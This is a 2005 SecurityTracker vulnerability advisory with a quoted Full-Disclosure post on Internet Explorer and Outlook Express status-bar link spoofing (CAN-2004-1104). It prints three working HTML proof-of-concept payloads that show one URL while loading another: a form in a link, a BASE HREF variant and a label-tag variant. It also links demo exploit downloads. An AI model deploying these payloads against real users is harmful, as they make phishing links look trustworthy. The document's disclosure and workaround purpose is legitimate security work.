(A Variation is Reported) Microsoft Internet Explorer Does Not Correctly Display Links With Embedded FORM Data
|
|
SecurityTracker Alert ID: 1013221
|
|
SecurityTracker URL: http://securitytracker.com/id?1013221
|
|
CVE Reference: CAN-2004-1104
(Links to External Site)
|
Date: Feb 17 2005
|
Impact: Modification of system information
|
Exploit Included: Yes
|
Version(s): 6
|
Description: A vulnerability was reported in Microsoft Internet Explorer. A remote user can create HTML with an embedded link that spoofs the
destination URL and causes the browser to fail to display the actual destination URL. Microsoft Outlook Express is also affected.
malware reported that a remote user can create HTML that contains a link with an HTML FORM action embedded within the link. The browser's
status bar will display the link address but not the FORM action address. However, the browser will load the FORM action.
Demonstration
exploit HTML can be in the following form:
<A href="http://[apparent destination]">
<FORM action=[actual destination] method=get>
<INPUT
style="BORDER-RIGHT: 0pt; BORDER-TOP: 0pt; FONT-SIZE: 10pt; BORDER-LEFT: 0pt;
CURSOR: hand; COLOR: blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR:
transparent;
TEXT-DECORATION: underline" type=submit value=http://[apparent destination]>
</A>
A remote user can create HTML
with a spoofed link that, when loaded by the target user, will direct the target user's browser to a malicious URL which can then
redirect the target user to the spoofed link. In this manner, the target user may be completely unaware of the malicious action.
A
demonstration exploit is available at:
http://www.malware.com/not-so-good.zip
In October 2004, malware reported that a BASE
HREF tag is also affected [CVE: CAN-2004-1104]. A demonstration exploit is provided:
<base href="http://www.microsoft.com">
<a
href=><form action="http://www.malware.com"
method="get"><INPUT style="BORDER-RIGHT: 0pt; BORDER-TOP: 0pt;
FONT-SIZE: 10pt; BORDER-LEFT:
0pt;
CURSOR: hand; COLOR: blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR:
transparent;TEXT-DECORATION: underline" type=submit
value=http://www.microsoft.com></form></a>
A demonstration exploit is available at:
http://www.malware.com/mwaresoft.html
Bitlance winter later reported a variation
of this vulnerability that uses a label tag. A demonstration exploit is provided:
<body style="color: WindowText; background-color:
Window;">
<div>IE/OE Restricted Zone Status Bar Spoofing</div>
<div>Tested on Windows XP with SP2 installed.</div>
<p><a id="SPOOF"
href="http://www.example.com/?maliciouscontents"></a></p>
<div>
<a href="http://www.microsoft.com/windows/default.mspx">
<table>
<caption>
<a href="http://www.microsoft.com/windows/default.mspx ">
<label for="SPOOF">
<u style="cursor: pointer; color: blue">
http://www.microsoft.com/windows/default.mspx
</u>
</label>
</a>
</caption>
</table>
</a>
</div>
|
Impact: A remote user can create a spoofed link that will load an arbitrary URL.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.microsoft.com/technet/security/ (Links to External Site)
|
Cause: Input validation error, State error
|
Underlying OS: Windows (Any)
|
Reported By: "winter bitlance" <bitlance_3@hotmail.com>
|
Message History:
This archive entry is a follow-up to the message listed below.
|
Source Message Contents
|
Date: Thu, 17 Feb 2005 05:22:08 +0000
From: "winter bitlance" <bitlance_3@hotmail.com>
Subject: [Full-Disclosure] IE/OE Restricted Zone Status Bar Spoofing
|
Hi LIST.
It is normally possible for script code to manipulate information displayed
in the status bar in the Internet Zone. By default, Outlook Express 6 open
HTML e-mail messages in the Restricted sites zone instead of the Internet
Zone. Outlook Express users may especially trust information displayed in
the status bar since HTML documents are viewed in context of the
"Restricted" zone, which has scripting support disabled.
However, errors in Internet Explorer allows manipulation of the status bar
without using any script code. This can be exploited by embedding a
specially crafted form in a link.
http-equiv has discovered a weakness in Internet Explorer, which
potentially can be exploited by malicious people to trick users into
visiting a malicious website which facilitates a "phishing" attack. (
CAN-2004-1104 )
Now another weakness which use a "label for id trick" has been discovered.
This weakness is a variant of CAN-2004-1104.
Example:
- -----8<----- -----8<----- -----8<----- -----8<-----
[!-- saved from url=(0007)http:// -->
[body style="color: WindowText; background-color: Window;">
[div>IE/OE Restricted Zone Status Bar Spoofing[/div>
[div>Tested on Windows XP with SP2 installed.[/div>
[p>[a id="SPOOF" href="http://www.example.com/?maliciouscontents">[/a>[/
p>
[div>
[a href="http://www.microsoft.com/windows/default.mspx">
[table>
[caption>
[a href="http://www.microsoft.com/windows/default.mspx ">
[label for="SPOOF">
[u style="cursor: pointer; color: blue">
http://www.microsoft.com/windows/default.mspx
[/u>
[/label>
[/a>
[/caption>
[/table>
[/a>
[/div>
- -----8<----- -----8<----- -----8<----- -----8<-----
workaround:( on Windows XP Service Pack 2 )
You can change the zone elevation setting under for each security zone by
configuring the following option from Allow to Disabled or Prompt in the
Custom Level Security dialog.
"Web sites in less privileged Web content zones can navigate into this
zone"
http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/mangxpsp2/mngieps.mspx
Solution:
Never follow links from untrusted sources.
Read e-mail messages in plain text format if you are using Outlook Express
6 SP1 or a later version , to help protect yourself from the HTML e-mail
attack vector.
REGARDS.
--
bitlance winter
_________________________________________________________________
�$BL5NAMFNL�(B250MB�$B$G%Q%o!<%"%C%W�(B �$B!V�(BMSN Hotmail�$B!W�(B http://www.hotmail.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
|
|
